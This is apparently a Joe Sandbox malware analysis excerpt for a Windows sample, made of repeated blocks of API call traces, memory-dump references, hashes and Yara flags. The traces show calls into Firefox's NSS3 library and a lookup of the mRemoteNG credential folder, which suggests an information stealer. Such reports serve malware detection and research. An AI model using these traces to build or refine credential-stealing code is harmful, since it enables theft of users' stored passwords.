                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$Arena_DeleteDestroyEnterFreeLibraryModuleSecureUnloadUnlockUtilValuefree
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3590924995-0
                                                                                                                                                                                                                              • Opcode ID: 3659dfaf599ca2893a17646f28d7d5e26368a59e124f871afb6a585040e0b8b5
                                                                                                                                                                                                                              • Instruction ID: ff81e746649468b020bfb1248019ef8598f60dd1c2ff538117c41b5e248d1b82
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3659dfaf599ca2893a17646f28d7d5e26368a59e124f871afb6a585040e0b8b5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF316FB4A047029FDB00AFB9C084669B7F4FF15358F015669D89997B00EB35E896CFC2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C968C1B
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 6C968C34
                                                                                                                                                                                                                              • PL_ArenaAllocate.NSS3 ref: 6C968C65
                                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6C968C9C
                                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6C968CB6
                                                                                                                                                                                                                                • Part of subcall function 6C9FDD70: TlsGetValue.KERNEL32 ref: 6C9FDD8C
                                                                                                                                                                                                                                • Part of subcall function 6C9FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9FDDB4
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                                                              • String ID: KRAM
                                                                                                                                                                                                                              • API String ID: 4127063985-3815160215
                                                                                                                                                                                                                              • Opcode ID: b2384def64ae43b179bdc99087f032698346c267ab7ac21199b13ea0b58c44d4
                                                                                                                                                                                                                              • Instruction ID: 2cf7cff0dc5bcd0e2fb39230833877d7181c3aa8e4cf0054881d0100ffa5bd88
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2384def64ae43b179bdc99087f032698346c267ab7ac21199b13ea0b58c44d4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 082180B16056018FE704AF79C484569BBF4FF16308F05896AD888CBB51EB39D886CB96
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PR_EnterMonitor.NSS3 ref: 6CA62CA0
                                                                                                                                                                                                                              • PR_ExitMonitor.NSS3 ref: 6CA62CBE
                                                                                                                                                                                                                              • calloc.MOZGLUE(00000001,00000014), ref: 6CA62CD1
                                                                                                                                                                                                                              • strdup.MOZGLUE(?), ref: 6CA62CE1
                                                                                                                                                                                                                              • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CA62D27
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • Loaded library %s (static lib), xrefs: 6CA62D22
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                                                                              • String ID: Loaded library %s (static lib)
                                                                                                                                                                                                                              • API String ID: 3511436785-2186981405
                                                                                                                                                                                                                              • Opcode ID: 9a8442896f4cb9c9e2da53b664ed40ee54b85ca809685c1cc1f052969bbe3b7c
                                                                                                                                                                                                                              • Instruction ID: c1b44c2474b3647b18c8a0f02381d77db3ef4ff6eb730fb97276d6767d537b0a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a8442896f4cb9c9e2da53b664ed40ee54b85ca809685c1cc1f052969bbe3b7c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D11E2B16003069FEB188F26D845AA677B5AB4634DF18C22DD90987F51E732D889CBA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 6C9BC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C9BDAE2,?), ref: 6C9BC6C2
                                                                                                                                                                                                                              • PR_Now.NSS3 ref: 6C9BCD35
                                                                                                                                                                                                                                • Part of subcall function 6CA19DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CA60A27), ref: 6CA19DC6
                                                                                                                                                                                                                                • Part of subcall function 6CA19DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CA60A27), ref: 6CA19DD1
                                                                                                                                                                                                                                • Part of subcall function 6CA19DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA19DED
                                                                                                                                                                                                                                • Part of subcall function 6C9A6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C951C6F,00000000,00000004,?,?), ref: 6C9A6C3F
                                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6C9BCD54
                                                                                                                                                                                                                                • Part of subcall function 6CA19BF0: TlsGetValue.KERNEL32(?,?,?,6CA60A75), ref: 6CA19C07
                                                                                                                                                                                                                                • Part of subcall function 6C9A7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C951CCC,00000000,00000000,?,?), ref: 6C9A729F
                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C9BCD9B
                                                                                                                                                                                                                              • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C9BCE0B
                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C9BCE2C
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B10F3
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: EnterCriticalSection.KERNEL32(?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B110C
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1141
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: PR_Unlock.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1182
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B119C
                                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C9BCE40
                                                                                                                                                                                                                                • Part of subcall function 6C9B14C0: TlsGetValue.KERNEL32 ref: 6C9B14E0
                                                                                                                                                                                                                                • Part of subcall function 6C9B14C0: EnterCriticalSection.KERNEL32 ref: 6C9B14F5
                                                                                                                                                                                                                                • Part of subcall function 6C9B14C0: PR_Unlock.NSS3 ref: 6C9B150D
                                                                                                                                                                                                                                • Part of subcall function 6C9BCEE0: PORT_ArenaMark_Util.NSS3(?,6C9BCD93,?), ref: 6C9BCEEE
                                                                                                                                                                                                                                • Part of subcall function 6C9BCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C9BCD93,?), ref: 6C9BCEFC
                                                                                                                                                                                                                                • Part of subcall function 6C9BCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C9BCD93,?), ref: 6C9BCF0B
                                                                                                                                                                                                                                • Part of subcall function 6C9BCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C9BCD93,?), ref: 6C9BCF1D
                                                                                                                                                                                                                                • Part of subcall function 6C9BCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C9BCD93,?), ref: 6C9BCF47
                                                                                                                                                                                                                                • Part of subcall function 6C9BCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C9BCD93,?), ref: 6C9BCF67
                                                                                                                                                                                                                                • Part of subcall function 6C9BCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C9BCD93,?,?,?,?,?,?,?,?,?,?,?,6C9BCD93,?), ref: 6C9BCF78
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3748922049-0
                                                                                                                                                                                                                              • Opcode ID: c52d4aa01439aadeccc0ba06426ca2031a5e3638d4a13ee7e64a5b4f7ed08c9f
                                                                                                                                                                                                                              • Instruction ID: dfffdd3dea3b4fd4b92f8156145b5cdb8e8dc07630447d3a4cb75597d610dd38
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c52d4aa01439aadeccc0ba06426ca2031a5e3638d4a13ee7e64a5b4f7ed08c9f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C51A1B6A00205EBEB10DF69DC40BAB73E8EF58348F250524E955BBB40EB31ED05CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C973F23,?), ref: 6C96E432
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C96E44F
                                                                                                                                                                                                                                • Part of subcall function 6C972C40: TlsGetValue.KERNEL32(6C973F23,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C972C62
                                                                                                                                                                                                                                • Part of subcall function 6C972C40: EnterCriticalSection.KERNEL32(0000001C,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C972C76
                                                                                                                                                                                                                                • Part of subcall function 6C972C40: PL_HashTableLookup.NSS3(00000000,?,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C972C86
                                                                                                                                                                                                                                • Part of subcall function 6C972C40: PR_Unlock.NSS3(00000000,?,?,?,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C972C93
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C973F23,?), ref: 6C96E494
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C96E4AD
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C96E4D6
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C96E52F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3106257965-0
                                                                                                                                                                                                                              • Opcode ID: 43b860bd467ea78eeb33a65a3dd57169e35f4bd41ca6a33b0bf8c7bbf8b50816
                                                                                                                                                                                                                              • Instruction ID: de49fd1ee665f877e4d49dfe98f7eb8185cc2f49f81d4906a14be9f2903938e2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43b860bd467ea78eeb33a65a3dd57169e35f4bd41ca6a33b0bf8c7bbf8b50816
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 344137B4A05706CFEF00EF79D98456ABBF4FF15304B054969D8949BB50E730E885CBA2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(-00000007), ref: 6C96660F
                                                                                                                                                                                                                                • Part of subcall function 6C9B0BE0: malloc.MOZGLUE(6C9A8D2D,?,00000000,?), ref: 6C9B0BF8
                                                                                                                                                                                                                                • Part of subcall function 6C9B0BE0: TlsGetValue.KERNEL32(6C9A8D2D,?,00000000,?), ref: 6C9B0C15
                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C966660
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C96667B
                                                                                                                                                                                                                              • SGN_DecodeDigestInfo.NSS3(?), ref: 6C96669B
                                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(-00000004), ref: 6C9666B0
                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C9666C8
                                                                                                                                                                                                                                • Part of subcall function 6C9925D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C96662E,?,?), ref: 6C992670
                                                                                                                                                                                                                                • Part of subcall function 6C9925D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C96662E,?), ref: 6C992684
                                                                                                                                                                                                                                • Part of subcall function 6C9925D0: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C9926C2
                                                                                                                                                                                                                                • Part of subcall function 6C9925D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C9926E0
                                                                                                                                                                                                                                • Part of subcall function 6C9925D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C9926F4
                                                                                                                                                                                                                                • Part of subcall function 6C9925D0: PR_Unlock.NSS3(?), ref: 6C99274D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: UtilValue$CriticalEnterSectionUnlock$AlgorithmAlloc_Arena_DecodeDigestErrorFreeInfoTag_freemalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2025608128-0
                                                                                                                                                                                                                              • Opcode ID: 9257083a7ac4564696510c9bd84c39053a0f3850d3807ec8cca0f71ec323f3e6
                                                                                                                                                                                                                              • Instruction ID: fb9e27cb934d0a6d2477417ea37e180ec8f9f114acfac968c0d1fc6e9205e2e3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9257083a7ac4564696510c9bd84c39053a0f3850d3807ec8cca0f71ec323f3e6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A53165B5A0121A9BEB00CFA9E845AAE77B8EF59258F140128EC15E7B40E731D905C7A1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __lock.LIBCMT ref: 00417BAE
                                                                                                                                                                                                                                • Part of subcall function 00417641: __mtinitlocknum.LIBCMT ref: 00417657
                                                                                                                                                                                                                                • Part of subcall function 00417641: __amsg_exit.LIBCMT ref: 00417663
                                                                                                                                                                                                                                • Part of subcall function 00417641: EnterCriticalSection.KERNEL32(00000000,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D,?,?,00417158,00000000,00421AC0,0041719F), ref: 0041766B
                                                                                                                                                                                                                              • DecodePointer.KERNEL32(004219C8,00000020,00417CF1,00000000,00000001,00000000,?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D), ref: 00417BEA
                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417BFB
                                                                                                                                                                                                                                • Part of subcall function 004179C2: EncodePointer.KERNEL32(00000000,004191B2,00423DC8,00000314,00000000,?,?,?,?,?,00417F08,00423DC8,Microsoft Visual C++ Runtime Library,00012010), ref: 004179C4
                                                                                                                                                                                                                              • DecodePointer.KERNEL32(-00000004,?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C21
                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C34
                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C3E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2005412495-0
                                                                                                                                                                                                                              • Opcode ID: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
                                                                                                                                                                                                                              • Instruction ID: 2ecc3aad81c9b81e2b27e7e3d170e1f8428b359c85680f8586e03e13f1a28f2c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39314C70A58309DBDF509FA9D8846DDBBF1BB48314F10802BE001A6290EB7C49C5CFAD
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$Value$CriticalDeleteSection
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 195087141-0
                                                                                                                                                                                                                              • Opcode ID: 802806bb435f5d9898e0446fd5172a6dbd197c4e134e1da83b53ac7074738480
                                                                                                                                                                                                                              • Instruction ID: a422ed74b48f20f2ab250df1ad149e1822badebacd622fe27cdda9d73d1be018
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 802806bb435f5d9898e0446fd5172a6dbd197c4e134e1da83b53ac7074738480
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D115174608B128BDB10BFB9D04826EBBF4BF55748F015A1DD8CA87600EB35D445CB92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(02F65410,?,?,?,0040F76C,?,02F65410,00000000), ref: 0041596C
                                                                                                                                                                                                                              • lstrcpyn.KERNEL32(C:\Users\user\AppData\Roaming\mRemoteNG\,02F65410,02F65410,?,0040F76C,?,02F65410), ref: 00415990
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,0040F76C,?,02F65410), ref: 004159A7
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004159C7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                                              • String ID: %s%s$C:\Users\user\AppData\Roaming\mRemoteNG\
                                                                                                                                                                                                                              • API String ID: 1206339513-1027354905
                                                                                                                                                                                                                              • Opcode ID: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
                                                                                                                                                                                                                              • Instruction ID: ad4ab28855ecf1822f83189248f4f970b5300654cb1d5d0a0ffaf2e78bbea45f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69015A75510908FFCB14DFA8D948EAE7BB9FF88344F108588F90A9B340CA71AA40CB94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
